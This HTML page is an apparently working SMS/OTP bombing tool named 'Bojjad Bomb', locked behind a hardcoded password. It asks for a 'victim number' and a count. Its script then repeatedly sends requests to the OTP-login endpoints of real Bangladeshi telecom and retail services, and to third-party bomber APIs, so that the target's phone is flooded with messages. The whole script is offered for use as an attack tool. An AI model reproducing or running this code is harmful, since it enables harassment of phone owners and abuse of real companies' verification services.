<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Bojjad Bomb</title>
  <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@500&display=swap" rel="stylesheet" />
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Orbitron', sans-serif;
    }

    body {
      background: #0f0f0f;
      color: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      overflow: hidden;
    }

    #particles-js {
      position: absolute;
      width: 100%;
      height: 100%;
      z-index: 0;
    }

    .login-screen, .container {
      z-index: 1;
      background: rgba(20, 20, 20, 0.95);
      padding: 30px;
      border-radius: 15px;
      box-shadow: 0 0 20px #ff0000a0;
      text-align: center;
      width: 90%;
      max-width: 400px;
    }

    .login-screen h2 {
      margin-bottom: 15px;
      color: #ffaa00;
      text-shadow: 0 0 10px #ffaa00;
    }

    input, button {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      border: none;
      border-radius: 8px;
      outline: none;
    }

    input {
      background: #1f1f1f;
      color: #fff;
      box-shadow: 0 0 5px #ffaa00;
    }

    button {
      background: #ff0000;
      color: white;
      font-weight: bold;
      box-shadow: 0 0 10px #ff0000, 0 0 20px #ff0000;
      cursor: pointer;
      transition: 0.3s ease;
    }

    button:hover {
      background: #cc0000;
      box-shadow: 0 0 20px #ff0000;
    }

    .telegram-btn {
      display: inline-block;
      margin-top: 15px;
      padding: 12px 20px;
      background: #0088cc;
      color: white;
      text-decoration: none;
      border-radius: 10px;
      box-shadow: 0 0 10px #0088cc, 0 0 20px #0088cc;
      transition: 0.3s ease;
    }

    .telegram-btn:hover {
      background: #0077b5;
      box-shadow: 0 0 20px #00cfff;
    }

    #loadingSpinner {
      width: 30px;
      height: 30px;
      border: 4px solid #ff0000;
      border-top: 4px solid transparent;
      border-radius: 50%;
      animation: spin 1s linear infinite;
      display: none;
      margin: 15px auto;
    }

    @keyframes spin {
      to { transform: rotate(360deg); }
    }

    #attackLogs {
      max-height: 130px;
      overflow-y: auto;
      background: #1a1a1a;
      padding: 10px;
      border-radius: 10px;
      margin-top: 15px;
      font-size: 14px;
      box-shadow: inset 0 0 10px #ff000055;
      text-align: left;
    }

    .alert {
      font-size: 16px;
      margin-top: 10px;
    }

    .success {
      color: #00ff00;
    }

    .failure {
      color: #ff3333;
    }

    .default {
      color: #ffaa00;
    }

    #countdownTimer {
      font-size: 16px;
      color: #ffaa00;
      margin-top: 10px;
    }
  </style>
</head>
<body>
  <div id="particles-js"></div>

  <!-- Login Screen -->
  <div class="login-screen" id="loginScreen">
    <h2>Enter Access Code</h2>
    <input type="password" id="loginPass" placeholder="Enter password" />
    <button onclick="checkLogin()">Unlock Access</button>
  </div>

  <!-- Main Container -->
  <div class="container" id="mainContainer" style="display: none;">
    <h1>Bojjad Bomb</h1>
    <input type="text" id="phoneNumber" placeholder="Victim Number +88">
    <input type="number" id="amount" placeholder="Booming Amount">
    <button onclick="sendOTP()">START ATTACK</button>
    <div id="loadingSpinner"></div>
    <div id="countdownTimer"></div>
    <div id="responseMessage" class="alert default">Ready...</div>
    <div id="attackLogs"></div>
    <a href="https://t.me/Allied404" target="_blank" class="telegram-btn">Join Telegram Channel</a>
  </div>

  <audio id="successSound" src="https://actions.google.com/sounds/v1/cartoon/clang_and_wobble.ogg" preload="auto"></audio>

  <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
  <script>
    particlesJS("particles-js", {
      particles: {
        number: { value: 70 },
        color: { value: "#ff0000" },
        shape: { type: "circle" },
        size: { value: 3 },
        move: { enable: true, speed: 2 },
        line_linked: { enable: true, color: "#ff0000", opacity: 0.4 }
      },
      interactivity: {
        events: {
          onhover: { enable: true, mode: "repulse" }
        }
      }
    });

    const loginPassword = "Bojjad";
    function checkLogin() {
      const input = document.getElementById("loginPass").value;
      if (input === loginPassword) {
        document.getElementById("loginScreen").style.display = "none";
        document.getElementById("mainContainer").style.display = "block";
      } else {
        alert("Wrong password!");
      }
    }

    async function sendRequest(url, method = 'GET', data = null) {
      try {
        let options = { method, headers: { 'Content-Type': 'application/json' } };
        if (data) options.body = JSON.stringify(data);
        let res = await fetch(url, options);
        return res.status >= 200 && res.status < 300;
      } catch (e) {
        return false;
      }
    }

    function delay(ms) {
      return new Promise(resolve => setTimeout(resolve, ms));
    }

    async function sendOTP() {
      const phone = document.getElementById('phoneNumber').value;
      const amount = document.getElementById('amount').value;
      const spinner = document.getElementById('loadingSpinner');
      const logs = document.getElementById('attackLogs');
      const responseMessage = document.getElementById('responseMessage');
      const timerDisplay = document.getElementById('countdownTimer');
      const sound = document.getElementById('successSound');

      if (!/^\d{11}$/.test(phone) || amount <= 0) {
        responseMessage.innerHTML = '<span class="alert failure">Invalid Number or Amount!</span>';
        return;
      }

      spinner.style.display = 'block';
      logs.innerHTML = '';
      responseMessage.innerHTML = '<span class="alert default">Attack Started...</span>';

      let count = amount;
      let time = count;
      let interval = setInterval(() => {
        timerDisplay.innerText = `Time Left: ${time}s`;
        if (time-- <= 0) clearInterval(interval);
      }, 1000);

      let apis = [
        { url: `https://expcyber.my.id/apis/v1.php?phone=${phone}`, method: 'GET' },
        { url: `https://lmnx9.xyz/boom/free.php?number=${phone}&amount=${amount}`, method: 'GET' },
        { url: `https://cokestudio23.sslwireless.com/api/check-gp-number`, method: 'POST', data: { msisdn: phone } },
        { url: `https://weblogin.grameenphone.com/backend/api/v1/otp`, method: 'POST', data: { msisdn: phone } },
        { url: `https://apix.rabbitholebd.com/appv2/login/requestOTP`, method: 'POST', data: { mobile: phone } },
        { url: `https://api.osudpotro.com/api/v1/users/send_otp`, method: 'POST', data: { mobile: phone, deviceToken: "web", language: "en", os: "web" } },
        { url: `https://fundesh.com.bd/api/auth/generateOTP?service_key=`, method: 'POST', data: { msisdn: phone } },
        { url: `https://api.swap.com.bd/api/v1/send-otp`, method: 'POST', data: { phone: phone } },
        { url: `https://api.bd.airtel.com/v1/account/login/otp`, method: 'POST', data: { phone_number: phone } },
        { url: `https://bikroy.com/data/phone_number_login/verifications/phone_login?phone=${phone}`, method: 'GET' },
        { url: `https://eshop-api.banglalink.net/api/v1/customer/send-otp`, method: 'POST', data: { type: 'phone', phone: phone } },
        { url: `https://cherykuwait.com/topbomb.php?phone=${phone}&amount=${amount}`, method: 'GET' },
        { url: `https://tcsbomberai.vercel.app/api/smsbomber?phone=${phone}`, method: 'GET' }
      ];

      const messages = ["Boom Sent!", "Target Missed!", "Direct Hit!", "Boom Delivered!", "Reloading...", "Incoming Blast!", "SMS Detonated!"];
      let successCount = 0;

      for (let i = 0; i < count; i++) {
        for (let api of apis) {
          let result = await sendRequest(api.url, api.method, api.data);
          let msg = messages[Math.floor(Math.random() * messages.length)];
          logs.innerHTML += `[${new Date().toLocaleTimeString()}] ${msg} ${result ? "✅" : "❌"}<br>`;
          logs.scrollTop = logs.scrollHeight;
          if (result) successCount++;
          await delay(300);
        }
      }

      spinner.style.display = 'none';
      if (successCount > 0) {
        responseMessage.innerHTML = `<span class="alert success">Attack Complete! (${successCount} Hits)</span>`;
        sound.play();
      } else {
        responseMessage.innerHTML = `<span class="alert failure">Attack Failed!</span>`;
      }
    }
  </script>
</body>
</html>
